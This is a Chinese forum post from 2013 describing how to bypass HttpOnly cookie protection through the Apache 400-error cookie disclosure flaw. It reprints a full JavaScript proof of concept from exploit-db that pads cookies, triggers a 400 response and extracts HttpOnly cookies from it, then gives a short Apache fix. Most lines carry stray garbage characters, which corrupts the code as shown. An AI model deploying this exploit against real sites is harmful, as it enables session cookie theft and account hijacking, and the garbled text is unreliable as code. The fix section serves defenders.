很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
# V" S9 R5 J) t! f. Y" m2 c Y* y ~- \) R
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:+ }) D! Z3 ?% W* p
# C0 s4 g' [8 c! q0 X
) f5 r+ I w; S5 b* r7 O) i' ^) v// http://www.exploit-db.com/exploits/18442/
- K: N: w8 r5 Z4 r+ F) U# }. ~. R' Pfunction setCookies (good) {
0 q! R+ D) m0 v5 { l& p// Construct string for cookie value' n* Y; ~ E* B
var str = "";: S' p2 \8 v7 s% n( L& y
for (var i=0; i< 819; i++) {
) |. o2 \ s/ L# y( X. vstr += "x";0 Z: A a. y3 y' k! I% H
}
4 L1 n% s2 S; y2 _& v$ d! [3 S// Set cookies* W" z9 [/ B" u Q/ J) g% K
for (i = 0; i < 10; i++) {% o3 u: f& }; i+ n' j
// Expire evil cookie |2 I, L) P" s* c" _( Z9 s
if (good) {
' s' ]% N# L# e' _( y" W, y% I' Gvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";* H% k. g7 M3 P% D
}
/ e, U; M7 W& N% N$ N& K/ t) a// Set evil cookie
7 \5 x/ @$ M4 A8 |) H0 G6 Q/ R- helse {) H, u v4 O9 Y( ^, s
var cookie = "xss"+i+"="+str+";path=/";/ [) `. X9 K6 \" a9 z! x1 `* W
}
* I7 c8 }2 D# h* O# S6 H/ Y: Vdocument.cookie = cookie;
* G5 u* Y I9 P" }/ Y) h% `}; B/ m& C8 ?7 V) l; v' P/ h
}6 }+ P- |& E, K
function makeRequest() {
7 m- ]6 `7 E/ {- {3 O2 V) XsetCookies();- c$ g! W& o4 |# H- f. W, T
function parseCookies () {
; i! Q- ?" ^9 Q( Y M) Hvar cookie_dict = {};7 U& C: x. q; P( X
// Only react on 400 status
( @/ p# Z {% `" V2 L/ Q) p9 ~# `' `if (xhr.readyState === 4 && xhr.status === 400) {
9 S1 n! ^8 } Z4 l2 n9 y// Replace newlines and match <pre> content1 q4 k9 O( F p7 q3 Q0 ?5 m
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
- T; I6 r! X, c' h- E$ dif (content.length) {6 G) ?; o7 q; _! q; l: Q
// Remove Cookie: prefix! \% P! {% i6 v8 I4 N$ T$ j% R
content = content[1].replace("Cookie: ", "");
- G1 D) x; M* n1 n% Mvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);" z) L1 h& l9 R. V% @
// Add cookies to object4 d1 Z. d2 V5 X3 G- \9 s5 w
for (var i=0; i<cookies.length; i++) {& E' R' S6 K- l. ]4 e
var s_c = cookies.split('=',2);5 h+ j) f' @' P& ^/ U# B' Z
cookie_dict[s_c[0]] = s_c[1];
1 X1 @2 K' j7 c/ T}3 m ~/ Z" `% s7 q7 q) j$ J2 m+ H% P% [
}
9 m7 k' ^3 \0 r P// Unset malicious cookies
3 [6 z+ u9 }) rsetCookies(true);
7 h+ [) v# m' k# Ialert(JSON.stringify(cookie_dict));
- u/ ^; y; }9 m$ D& e: \* `}! d' m4 ]3 n) z& Z6 }
}7 O0 [& {5 \6 a
// Make XHR request) @& M: W& {9 i
var xhr = new XMLHttpRequest();
3 X! a5 N7 G9 Y/ V) v; Yxhr.onreadystatechange = parseCookies;
- V) O& b0 j! W: M5 Sxhr.open("GET", "/", true);0 N: r& N7 g( q9 i- L8 z! ~0 s
xhr.send(null);1 k e! w1 k' Z/ w4 O
}
3 Q1 z3 _2 d. O, ?7 NmakeRequest();
. B; W% X' o, ?' b2 O' Q T
& W, }+ F6 r. r你就能看见华丽丽的400错误包含着cookie信息。% w4 v( K- l/ f. ]% p
! I. _: u9 {' f) L1 l下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#2 M* |2 e& q5 v, T7 J- q) J9 E( G
% ` S$ t) y& p$ i3 V4 |修复方案:: Y0 R2 B% ^9 r+ e5 G3 Q
6 a9 D0 @+ b H6 M$ l9 rApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
- g3 a# N' V! R, J- n4 ~* D+ ]+ d& g9 u9 |* W9 g9 i; t
In the event of a problem or error, Apachecan be configured to do one of four things,
* O4 `9 U4 g8 s
& L8 n/ { K7 f# [0 q7 S1 ^1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
* @# E% l/ f" t H/ J) \8 @2. output acustomized message输出一段信息
8 X; y' u0 |# [3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 6 d3 i9 o# r" P2 m; x u! E
4. redirect to an external URL to handle theproblem/error转向一个外部URL
' W q0 @( o i! m. M% g8 H7 r3 |& e0 B3 a8 R/ k, t& d, C
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容9 |8 G) K @9 x2 J' y% I6 W: o0 S
+ K- q" z4 I# N: |- u; AApache配置:
5 R( F" W l( f. K
5 A) F- p4 X$ j/ U$ _ErrorDocument400 " security test" G% D1 t2 i6 k, h, h
$ P4 t: f5 F4 d# [7 Y' ]$ E2 U* r! B当然,升级apache到最新也可:)。
# a8 E4 q7 o; Y
8 n( m5 _3 I9 N; R3 O+ z( z参考:http://httpd.apache.org/security/vulnerabilities_22.html9 x. Y. {! ^4 m0 S# G; v
2 \; K; U' J; D7 i( G' L |
发表于 2013-4-19 19:15:43
收藏
支持
反对